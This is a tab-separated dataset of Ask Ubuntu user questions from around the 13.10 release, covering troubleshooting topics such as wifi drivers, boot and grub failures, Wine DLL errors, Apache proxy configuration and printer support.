366599	use a terminal as desktop background instead of the wallpaper	i have come to a conclusion that all my needs from nautilus are satisfied with the terminal and last file manager . it also dismisses the need for multiple nautilus instances , which makes mess when i forget how i 'm meant to use different workspaces . the next step for my simplification would be to get rid of any possibility to open nautilus . also i thought that my interaction with computer is file centered , therefore it makes sense to leave file manager in background of applications . are there any ways to make terminal as desktop background with which i could interact ?
366603	synaptic corrupted , not able to install anything even from terminal	my synaptic is not working . whenever i open it , i find that it is corrupted and asks me to run dpkg -- -configure -a whenever i run it on root terminal , it starts downloading 1 gb files and there is written `` 48h 22m left '' or something like that . i do n't want to download that file . please help
366610	wifi not working in ubuntu 13.10 with ralink rt3290	i have upgraded from ubuntu 13.04 to ubuntu 13.10 and now my wifi does n't work . it takes a lot of time to connect but when connected , connection is quickly lost again . in ubuntu 13.04 worked fine . here are some outputs : lspci | grep wireless 01:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no lsmod | grep rt2800 rt2800pci 18966 0 rt2800lib 95449 1 rt2800pci rt2x00pci 13287 1 rt2800pci rt2x00mmio 13661 1 rt2800pci rt2x00lib 56053 4 rt2x00pci , rt2800lib , rt2800pci , rt2x00mmio mac80211 634661 3 rt2x00lib , rt2x00pci , rt2800lib eeprom_93cx6 13344 1 rt2800pci crc_ccitt 12707 1 rt2800lib dmesg | grep rt2800 [ 19.959959 ] rt2800pci 0000:01:00.0 : irq 46 for msi/msi-x modinfo rt2800pci | grep 3290 alias : pci : v00001814d00003290sv*sd*bc*sc*i* solution for me : it appears a ubuntu bug , i have found a solution here : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1049466 post 117 and + thanks
366614	new to ubuntu can not find vlc on ubuntu search or install need some help here please	i 'm new to ubuntu and it 's an awesome system but i ca n't find vlc on the ubunut search or figure out how to install any software like flash player etc can anyone help out please will be greatly appreciated
366618	how can i force turbo boost work constantly in ubuntu ?	in windows i have a tool which i just turn on and have turbo boost constantly on my i5 in laptop.. unfortunately i ca n't overclock my cpu over bios . can anybody recommend any tool for ubuntu ? i 'm not worry about ventilation and electricity .
366620	13.04 - > 13.10 = black screen after grub , before login	i 'm fairly new to linux so fancy lingo will need explaining : - ) updating ubuntu from 13.04 to 13.10 has resulted in a black screen after selecting ubuntu in grub . i can still select any other operating systems in grub without issue including ubuntu 's recovery mode . my current grub2 options are : ubuntu ( < -- this is the one that black screens , 13.10 ) ubuntu recovery mode memtest mint mint recovery mode ubuntu ( different , old install , 13.04 ) '' recovery mode windows 8 ( here at the moment ) a bit of searching suggested that it 's a kernel issue with uefi ; my motherboard has no compatibility options so that 's a no-go . there 's also no `` previous linux versions '' option/submenu under grub . is there any way of updating the kernel from the recovery menu ? or rolling it back ? or is it a completely separate issue ? help appreciated .
366623	shutdown , logout , restart not working in 13.10	i am using ubuntu 13.10 and have installed compiz settings manager and cairo dock . the top right corner which gives you option for about this computer system settings shutdown restart logout and others seems to have a problem all options are working except shutdown , logout , suspend , restart . whenever i click on them nothing happens and sometimes this icon disappears from this tray . how can i fix this ?
366626	how to return default window manager ?	i removed emerald window-manager and now i dont have any window- mamanger . how can i return default manager ? and what is default window-manager ? mutter or metacity ? i have ubuntu 13.10
366633	connect a local dir to ftp server	i am returning tu ubuntu . i was using the 11.x version of it few years ago . there i was able to create an folder ! and connect ( mount ) this folder to a remote ftp-server ! so when i was clicking on the folder on my pc , i saw all the folders and files that are live on ftp . and if i were chanching them , they were automatically uploaded . i ca n't get that on my 12.04 using filezilla is not an option for me . i need somehow to get that working . i mean it worked in 11.x too . please help
366635	ld error while linking to sdl2	i 'm struggling in the attept to compile c++ with sdl2 . i 've done as always : checkout the code ( both from mercurial and libsdl.org ) ./configure , make , sudo make install but it keeps to say : /usr/bin/ld : error : can not find -lsdl2 i need to get working on my source code quickly and on 13.04 and 13.10 these operations always led me to working libs . now back on 12.04 something strange is happening . also the make install instructions said : libraries have been installed in : /usr/local/lib if you ever happen to want to link against installed libraries in a given directory , libdir , you must either use libtool , and specify the full pathname of the library , or use the `-llibdir ' flag during linking and do at least one of the following : - add libdir to the `ld_library_path ' environment variable during execution - add libdir to the `ld_run_path ' environment variable during linking - use the `-wl , -rpath -wl , libdir ' linker flag - have your system administrator add libdir to `/etc/ld.so.conf' can someone please elaborate a little bit on these instructions , since i do n't seem to get it ? echoing both variables shows they 're empty , also i 'm on a 64 bit version of 12.04 ( it must matter since on both 13.04/13.10 no problems at all )
366636	all chrome data apparently missing after 13.10 upgrade	i have just undergone the upgrade from 13.04 to 13.10 and rebooted to find that not only did the google chrome session i had previously had running appear to be gone , everything else chrome-related seemed to be missing . extensions ? bookmarks ? history ? all gone . this is not an acceptable state of affairs . how can i find out if this information is still somewhere on my hard drive ? ( potentially relevant : last night i found that my computer had frozen several hours previously , of the variety that freezes the pointer and even the clock in the corner of the screen . i discovered the upgrade was available after a hard reset ; i did not bother opening chrome at the time . )
366637	how can i make wired internet connection work in 12.04 lts ?	it stopped working after the first software update . i would be grateful if someone can help me fix this problem . running a system test for networking only , the following results were obtained : networking/detect passed qualcomm atheros ar9485 wireless network adapter ( rev 01 ) qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) networking/internet failed error : root : could not find def gateway info in /proc error : root : could not find default gateway by running route $ /sbin/ifconfig gives the following output : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2624 errors:0 dropped:0 overruns:0 frame:0 tx packets:2624 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:195424 ( 195.4 kb ) tx bytes:195424 ( 195.4 kb ) wlan0 link encap : ethernet hwaddr 6c:71 : d9:8e : e7 : ab up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) $ ip link gives the following output : 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : wlan0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc mq state down qlen 1000 link/ether 6c:71 : d9:8e : e7 : ab brd ff : ff : ff : ff : ff : ff $ lspci -v gives the following output : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : asustek computer inc. device 14c7 flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. device 14c7 flags : bus master , fast devsel , latency 0 , irq 42 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : asustek computer inc. device 14c7 flags : bus master , medium devsel , latency 0 , irq 41 memory at f7e00000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) subsystem : asustek computer inc. device 14c7 flags : bus master , fast devsel , latency 0 , irq 43 memory at f7e1a000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 14c7 flags : bus master , medium devsel , latency 0 , irq 16 memory at f7e18000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : asustek computer inc. device 1c33 flags : bus master , fast devsel , latency 0 , irq 44 memory at f7e10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : f7d00000-f7dfffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f7c00000-f7cfffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : asustek computer inc. device 14c7 flags : bus master , medium devsel , latency 0 , irq 23 memory at f7e17000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) subsystem : asustek computer inc. device 14c7 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : asustek computer inc. device 14c7 flags : bus master , 66mhz , medium devsel , latency 0 , irq 40 i/o ports at f0b0 [ size=8 ] i/o ports at f0a0 [ size=4 ] i/o ports at f090 [ size=8 ] i/o ports at f080 [ size=4 ] i/o ports at f060 [ size=32 ] memory at f7e16000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) subsystem : asustek computer inc. device 14c7 flags : medium devsel , irq 10 memory at f7e15000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f040 [ size=32 ] kernel modules : i2c-i801 02:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) subsystem : azurewave device 1186 flags : bus master , fast devsel , latency 0 , irq 17 memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=512k ] expansion rom at f7d80000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k kernel modules : ath9k 03:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) subsystem : asustek computer inc. device 14c7 flags : bus master , fast devsel , latency 0 , irq 10 memory at f7c00000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at e000 [ size=128 ] capabilities : < access denied > $ lspci -nn -d 1969 : gives the following output : 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 )
366638	how to set limit to the trash bin in unity	is there a way to set ( or at least see ) the limit of trash size in ubuntu 12.04 ? thanks !
366639	install wine problem	i wa n't to install wine in ubuntu but after type this sentence a message appear that says : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? what is the solution of this problem ?
366646	how can change background of nautilus	how can i change background color of nautilus in ubuntu 13.10 i edited nautilus.css as specified in how do i theme the nautilus background image ? . but this changed only side bar color can anyone help here ?
366647	plymouth interrupted	my plymouth splash screen only shows up for about 2 seconds , then the screen turns black for about 3 seconds and then plymouth returns , but with frozen animation , for another 3 seconds before unity-greeter shows up . i do n't have any problem with the speed ( except some issue with my grub asked here ) , but i 'd like to have a continuos boot animation . how can i achieve this ? note : this appears both with defaule theme ubuntu-logo and other themes , so it is n't a theme-related problem . raring x64
366648	dual boot ubuntu and windows 7.failed to boot into windows 7	i have installed windows 7 firstly and then ubuntu quantal quetzal o.s ..when i enter into grub showing options windows 7 and ubuntu , when i click windows 7.system is restarting and grub is again displayed.ubuntu is noramally working.i had tried to update grub to grub2.and i had done all possible way to update grub.but im facing that problem again.system is restarting when i click the option windows 7.what to doo ? ?
366651	printing from inside a windows 7 vm via virtualbox 4.3 with 12.04 lts	i have installed windows 7 64-bit as vm . i am unable to install my printer in windows 7 . usb is working and all extensions and guest additions are installed . usb ports are shown in virtual machine , but printing does not happen . i have tried through various updates of virtualbox and ubuntu , but it does not work . finally checked usb mode entry in usb/-modeswitch.conf file - changed it . all is working fine .
366656	how to use put command in tftp	how to use put command in tftp to send file to server host in that articular directory remotely ,
366660	apparmor do n't start with 12.04 lts 64bit	i installed with apt-get install apparmor-utils apparmor-profiles apparmor-notify but even after a reboot aa-status tells me apparmor module is not loaded . cant find entry in syslog and /etc/init.d/apparmor start has no output do n't know how to fix this : (
366661	install i386 and amd64 librarires at the same time	is it possible to install i386 and amd64 versions of a library at the same time ? we could do that with ia32-libs in the past , but it has now been deprecated . installing sdl i386 removes sdl amd64 ( and all of its amd64 dependencies ) , but i need to have both versions . so , is it possible ?
366662	canon pixma mg2555 , no drivers for ubuntu	i recently got canon pixma mg2555 . i have ubuntu 12.04lts and there are no drivers for it . is there any way i can make it work without a driver ? cheers !
366664	remove postgresql and daemon user entries in ubuntu logon screen	i installed ubuntu 13.10 and installed some software . now i see two new users in the logon screen called daemon and postgres . how can this happen ? is there a way to remove these entries from logon screen without removing these two user roles ( i think these two roles are essential for certain applications ) .
366665	compatible hardware under ubuntu	i am planning to install an open source os ( for ex . ubuntu ) to my fujitsu lifetime 753 notebook . i have this brother multi-function printer and this tp link router now the question - are these 3 devices all compatible with ubuntu ?
366666	can not login to ubuntu 13.10 hosted in virtualbox from os x mavericks	when i try to log in into ubuntu ssh does n't accept my password ( password is correct ) : last login : sun oct 27 12:11:34 from localhost macbook : ~ jirka $ ssh jirka @ 127.0.0.1 password : password : password : permission denied ( publickey , keyboard-interactive ) . macbook : ~ jirka $ i set port forwarding in in virtual box setting . what am i doing wrong ?
366670	accidentally use lvm during installation of 13.10	i have 2 partitions , one is for window and the other one is for ubuntu . however i had a 12.04 version of ubuntu , and i want to upgrade to 13.10 . during installation process i choose replace 12.04 with 13.10 then there is a lvm option and i accidentally clicked on that , i thought ubuntu would warn me if any data is wiped . do you have a way to recovery my window partition back ? thank you !
366671	help me improve boot time ?	here is a part of my dmesg output witch i think it has some issues tell me what can i do to reduce that gap [ 4.573598 ] scsi 2:0:0:0 : cd-rom hp cddvdw ts-l633r 0200 pq : 0 ansi : 5 [ 4.579209 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 4.579214 ] cdrom : uniform cd-rom driver revision : 3.20 [ 4.579438 ] sr 2:0:0:0 : attached scsi cd-rom sr0 [ 4.579516 ] sr 2:0:0:0 : attached scsi generic sg2 type 5 [ 4.779326 ] sd 0:0:0:0 : [ sdb ] attached scsi removable disk [ 4.896157 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) [ 14.463848 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 35.306288 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 35.556744 ] systemd-udevd [ 329 ] : starting version 204 [ 35.939191 ] lp : driver loaded but no devices found [ 38.329727 ] ext4-fs ( sda6 ) : re-mounted . opts : errors=remount-ro [ 40.004807 ] acpi warning : 0x00000428-0x0000042f systemio conflicts with region \pmio 1 ( 20130517/utaddress-251 ) [ 40.004814 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 40.004819 ] acpi warning : 0x00000530-0x0000053f systemio conflicts with region \gpio 1 ( 20130517/utaddress-251 ) [ 40.004823 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 40.004825 ] acpi warning : 0x00000500-0x0000052f systemio conflicts with region \gpio 1 ( 20130517/utaddress-251 ) [ 40.004829 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 40.004831 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 40.713911 ] microcode : cpu0 sig=0x1067a , pf=0x80 , revision=0xa0b cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda6 during installation uuid=2ab89eaf-a4a7-40c7-9344-07e740b884b7 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid=a13e7994-6cf5-4092-97cb-e496d718da70 /dev/mapper/cryptswap1 none swap sw 0 0 uuid=b802eecf02ee9224 /media/doc auto ifconfig eth0 eth0 link encap : ethernet hwaddr 64:31:50:7c:93 : db broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
366673	problem running .exe file	i installed wine from software center , but when i execute .exe file , it shows this message : err : module : import_dll library msvbvm60.dll so i downloaded dll fixer , but it gives an error when i run it ! !
366674	wired internet connection problem on ubuntu 12.04	recently i install ubuntu 12.04 only one time i set up the internet connection but it was disconnected after few munities and also the internet connection is too slow . after few hours later that connection is gone and the network connection states shown as disconnected but my cable is still connected . can you help me ?
366679	workflow for creating math heavy notes and review sheets on linux	i 'm looking for an effective way to create notes , summaries , reviews and essays . thus far i used a mixture of libreoffice and latex , depending on size , complexity and importance . anything that contained math related things requiring math notation ( in some cases there were only math notations , like my math or physics homework ) , i usually shied away from software and did it manually with paper and pen . the constant scanning , painful management of these files , and max file size problems now force me to reconsider this process : what 's the most effective way to create math-notation heavy notes on linux considering the following attributes ? quality and capabilities - am i limited in using only certain math notations ? compatibility - can i export to small pdf-files ? time requirement once usage-skill is mastered - am i faster then writing per hand ? learning curve - does it take a long time to learn how to use this process comment : i guess 1. should n't be too big of a problem and 4. does n't concern me too much as long as i 'm getting what i want . i tried both libre and latex to do this , but it seems like i need to practice a bit to actually get faster then writing on paper . ( considering the total time of both processes . notes , writing on another paper in nice writing , scanning and managing on the one side versus thinking process and final drafting in one on the other side . i do n't need to write everything twice on the computer . ) also it seems a little difficult to manage the thinking about creating the notation and thinking about the problem at the same time . the way i do latex right now , i do n't see my results in real-time and sometimes i have formatting mistakes , that keep me from thinking about the problem itself . i 'm checking what you guys do , before i dedicate more time into digging deep into either latex or libre .
366680	gummiboot on an ext2 partition	apparently gummiboot requires a fat32 partition , but can the ext2 driver that comes with refind be used with gummiboot so that it can be booted from an ext2 partition ?
366681	ca n't install primus : i386 package on ubuntu 13.10 x86_64	when i try to install primus : i386 on my ubuntu 13.10 x86_64 machine , i get this error : the following packages have unmet dependencies : primus : i386 : depends : bumblebee : i386 but it is not going to be installed then i try to install bumblebee : i386 and get this error : the following packages have unmet dependencies : bumblebee : i386 : depends : init-system-helpers : i386 ( > = 1.5 ) but it is not installable and , finally , when i try to install init-system-helpers : i386 : package init-system-helpers : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'init-system-helpers : i386 ' has no installation candidate i need primus : i386 in order to run steam games properly with my optimus nvidia gpu , as most steam games are in 32-bit . this page is a little more specific . i was able to install primus : i386 on ubuntu 13.04 . do n't know what happened . thanks in advance !
366685	sound system does not work well in dell 1747 laptop	i own a dell studio 1747 laptop which has built in stereo speakers from jbl . i have problems with sound playback . my sound from youtube or other places is very bad and it does not give stereo sound , only mono and the bass boost does n't work at all . when i try to plug in my headphones they do n't give any output . my os are dualboot win7/ubuntu 12.04.3 lts . i really dont know how to fix it , can someone help please ?
366686	ubuntu eclipse/aptana kiosk - what 's a better solution ?	using an old system and wanting to run apatana and/or eclipse and provide as much resources to the application as possible it was decided to run the application as a desktop session . being a single user environment locking down the system is not important or desired . the basic setup is simple . create a desktop file ( startide.desktop ) and an execution script ( startide ) . though this works , there are obvious problems such as the ide has not started in full screen view and windowing problems such as accessing the help . eclipse runtime options were reviewed yet was unable to find any setting for resolution parameters or full screen options . startide.desktop [ desktop entry ] name=ide comment=ide only desktop environment exec=/usr/bin/startide # icon= type=application startide # ! /bin/bash /opt/aptana_studio_3/aptanastudio3 actually using this ( startide ) script ( the previously posted script would be a better location for apatana in multi-user environments ) : # ! /bin/bash /home/ < username > /documents/programs/aptana_studio_3/aptanastudio3
366689	apache - proxy using vhosts	i 've been trying for a few days now to get this running , but with no luck . i need to accomplish this using apache httpd : requests sent to subdomain blog.domain.tld sent to port 80 on should return the same as requests on port 2000 requests sent to the ip of the server directly ( without domain names ) to port 80 should return data from /var/www ( normal webserver ) my last try was this code in /etc/apache2/httpd.conf : < virtualhost *:80 > servername 31.31.79.187 documentroot /var/www < /virtualhost > < virtualhost *:80 > servername blog.noxx2.eu < proxy * > order allow , deny allow from all < /proxy > proxypass / http : //31.31.79.187:2368/ proxypassreverse / http : //31.31.79.187:2368/ < /virtualhost > this does it job for the subdomain , but for the requests to the ip , it just returns a http 403 . any way how to make this running ? thanks
366691	ubuntu 13.04 installation boots , compiz fails and screen starts flashing	i installed ubuntu 13.04 on a desktop with : a via motherboard amd sempron 3000+ cpu ati hd 3650 agp 1.5 gb ram the installation completed successfully , except for it freezing on asking to kill processes after trying to do the mandatory reboot . it sat like that there for 1 hour , after which i force rebooted the machine . the first time i tried to boot , it stayed at the ubuntu logo and the loading `` bar '' , but with a functioning cursor . the second time , after a force reboot , it got to the desktop , but soon after it went to the login screen , after that the screen started flashing between the login screen and a blinking underscore . the third time it reported an error , originating from usr/bin/compiz . after closing the error report the same situation occured : the screen started flashing between login screen and black screen with a blinking underscore character .
366692	download dll files from terminal	can i download dll files from terminal ? i want to download this file : msvbvm60.dll
366693	software to easily and quickely create colorful and intuitive review sheets	what is the most effective way to create review papers that include math notation on the computer considering the following aspects ? quality and capabilities - what limits do i have in creating graphs , figures and math notation ? compatibility - can i export to small pdf-files ? time requirement once usage-skill is mastered - am i faster then writing per hand ? learning curve - does it take a long time to learn how to use this process example picture of how i did it so far . i 'm very open to learning about different formats .
366695	black screen after changing to gnome flashback from gnome flashback ( no effects )	installed 13.10 on an older computer . everything worked fine but running very slow with unity , so installed gnome flashback and it worked extremely well on gnome flashback ( no effects ) . decided to try gnome flashback and now all i get is a black screen on startup with a mouse cursor .
366697	ubuntu dash 13.10 not searching files ?	this seemed to help but the dash is still not searching files . it however does search folders . document directory searches fine . download directory does n't search correctly even though i just just added items ( i did open the items because i read unity does n't index items unless they are opened ) . things i have tried : rm ~/.cache/software-center -r unity -- reset & download directory contains : /home/username/downloads/untitled folder /home/username/downloads/empty /home/username/downloads/world /home/username/downloads/test.pdf searching the dash with the keyworld `` downloads '' yields : 1 folder `` downloads '' document directory contains : /home/username/documents/helloworld /home/username/documents/emptydoc /home/username/documents/helloworld.java /home/username/documents/tryingtosearch searching the dash with the keyworld `` documents '' yields : 1 folder `` documents '' : /home/username/documents/helloworld /home/username/documents/emptydoc /home/username/documents/helloworld.java but `` tryingtosearch '' is not there . is this a file indexing issue ? if it matters i did run this code previously : gsettings set com.canonical.unity.lenses disabled-scopes `` [ 'more_suggestions-amazon.scope ' , 'more_suggestions-u1ms.scope ' , 'more_suggestions-populartracks.scope ' , 'music-musicstore.scope ' , 'more_suggestions-ebay.scope ' , 'more_suggestions-ubuntushop.scope ' , 'more_suggestions-skimlinks.scope ' ] '' and this code : sudo apt-get remove unity-webapps* ^this messed up my desktop and i had to fix it . i do n't recall what command i used to fix it but i think it was this : sudo dconf reset -f /org/compiz/ this seemed to fix it : sudo updatedb should i really have to run that each time though ? obviously one could create a bash script but that is disappointing if one has to run that each time . i have tried the solutions on this page : dash search gives no result
366701	freezing problem for ubuntu 13.10	using dell inspiron 14r 5420 , system information : product : intel ( r ) core ( tm ) i5-3210m cpu @ 2.50ghz vendor : intel corp. physical id : 1 bus info : cpu @ 0 size : 1200mhz capacity : 1200mhz width : 64 bits memtotal : 3902800 kb memfree : 1010668 kb distributor id : ubuntu description : ubuntu 13.10 connected with internet by wifi . sometimes system halt again again for freezing problem . have any solution .
366704	problem with dll file	i want to run emulator 8086 on ubunto , but it 's told me that is msvbvm60.dll missing so i download this dll file to my computer , but it 's still telling me that msvbvm60.dll ismissing
366705	add the risize arrow to xubuntu as in mac os x	how can i set windows to occupy my entire screen , so it looks just like it would if you were using a windows pc in full screen mode , and all of the parallels desktop controls are hidden . this future it 's default on mac os x : i want to add this button on xubuntu , as on pear os :
366708	ca n't empty rubbish bin	so , i had issues having a full disk , but for now i solved it . now , after i installed bleachbit , this program was wipping free disk space and all of suddenly it freezes . i left it like 30min but as it was still frozen i decide to reboot the notebook and do it again , same thing happens , so i decide to leave it cause the full disk sign did n't appear . but i noticed that i have a folder in the rubbish bin named `` ablyztulpm.2.2 '' and every time that i delete it from the rubbish bin , the ubuntu `` explorer , exe '' it freezes . i looked up here some other similar questions , i went to ~/.local/share/trash/ and try to manually delete what was inside of the folders , but every time that i do it , the folder regenerates again . i tried with bleachbit to empty the rubbish bin and bleachbit stopped working . i tried to run this at the terminal sudo -i rm -rv /home/ < your_username > /.local/share/trash/files/* but the terminal keeps delete the folder as the folder regenerates it self . so..what can i do ? cheers .
366710	i ca n't modify the screen brightness on xubuntu 13.10	i got this problem with brightness on my fresh xubuntu 13.10 install.. it ai n't inc/decrease the screen brightness when pressing fn+f5/f6 ! ! i 've tried some solutions like setting these values in the /etc/default/grub file and sudo updating grub ( this worked for me on my previous xubuntu 13.04 install ) grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_osi=linux acpi_backlight=vendor '' but still not working though : / i have got a sony vaio vpcej3b1e running xubuntu 13.10 x64bit and an nvidia geforce 410m and using the propritory drivers 319 thanks in advance !
366712	ubuntu without nautilus . best way to paint a wallpaper ?	i 've replaced nautilus with pcmanfm on ubuntu 13.04 , because i want to completely get rid of nautilus . i do n't like having nautilus installed only for painting a wallpaper . applications like firefox or transmission open nautilus when opening a directory . uninstalling nautilus fixes that for me . i only want basic wallpaper functionality ( i.e . no black screen ) , better if it honors the system settings wallpaper . i can live without the desktop icons and stuff . what 's the best way of achieving this ?
366713	is there any way to mount a partition to a defined folder using udisks	https : //help.ubuntu.com/community/automaticallymountpartitions /usr/bin/udisks -- mount /dev/disk/by-uuid/1313-f422 using above tutorial i am happy to mount my other partitions using udisks , but i would like to mount it to a folder like how it does using fstab . i do n't want to mount these partitions system wide , so i dont want to go with fstab way . so is there any way to do that with udisks ? google did n't help me much . i could n't find all udisks parameters such as -- mount-options etc . thanks in advance .
366714	after choosing `` install ubuntu '' pc restarts at the same point	after booting from my usb device the system boots normally . but at the point where i am supposed to choose my kind of installation ( along with win7 ) the system restarts without making any changes . so after the restart i am at the beginning again.. a circle and i have no idea how to interfere at this point . sorry , its my first time installing ubuntu . thanks
366719	how can i remove r in ubuntu server 12.04	i do sudo apt-get remove r-base-core and sudo apt-get remove r-base sudo apt-get remove autoremove but steel driving r in ubuntu ... ... ..
366720	nothing shown after clicking live usb mode in 13.04	ubuntu can not run from a 4gib kingston usb flash drive live on my computer . after clicking the live using button nothing showed on screen but main wallpaper only and mouse navigation . how can i fix this
366721	upgrade 10.04 - 12.04 - how do i upgrade in one step	unfortunately i have only 1g/mth & have used a lot downloading 12.04. onto a friends w7 - cos i ca n't get the k3772-z vodafone 3g modem to connect - have got the directions how to get it to work with ubuntu 12.03 from this site - many thanks guys should i back-up & install ? bruce - east london , south africa
366722	can i get a warning when merging folders ?	i used windows prior to ubuntu . in windows when i merged folders it would give me a warning and ask my if i wanted to merge the folders , in ubuntu it just merges , the merging works fine but i would like to see some kind of dialogue verifying that i want to merge folders . right now i only get get a warning when i overwrite a file . i am using ubuntu 12.04 and nemo as my file manager .
366724	13.10 on hp dc5700 sff keeps restarting after shutdown	one of my ubuntu machines , a hp dc5700 sff running 13.10 , can no longer shutdown , instead the computer constantly reboots . i have tried everything i could find on this topic in the forums but nothing fixes it . attemting to shutdown from the menu , or terminal or even using the powerbutton will trigger a re-boot instead of shutting down . the only way to stop this is to pull the powerplug . after reconnecting the powerplug the computer stays off , so no reboot , this suggests that it is not caused by a defective powerbutton . the 13.10 is installed as an upgrade from 13.04 , i 'm 100 % shure the 13.04 version did not not have this problem , but i do n't know if it started directly after the update or a few days later . how to fix this ? please help me
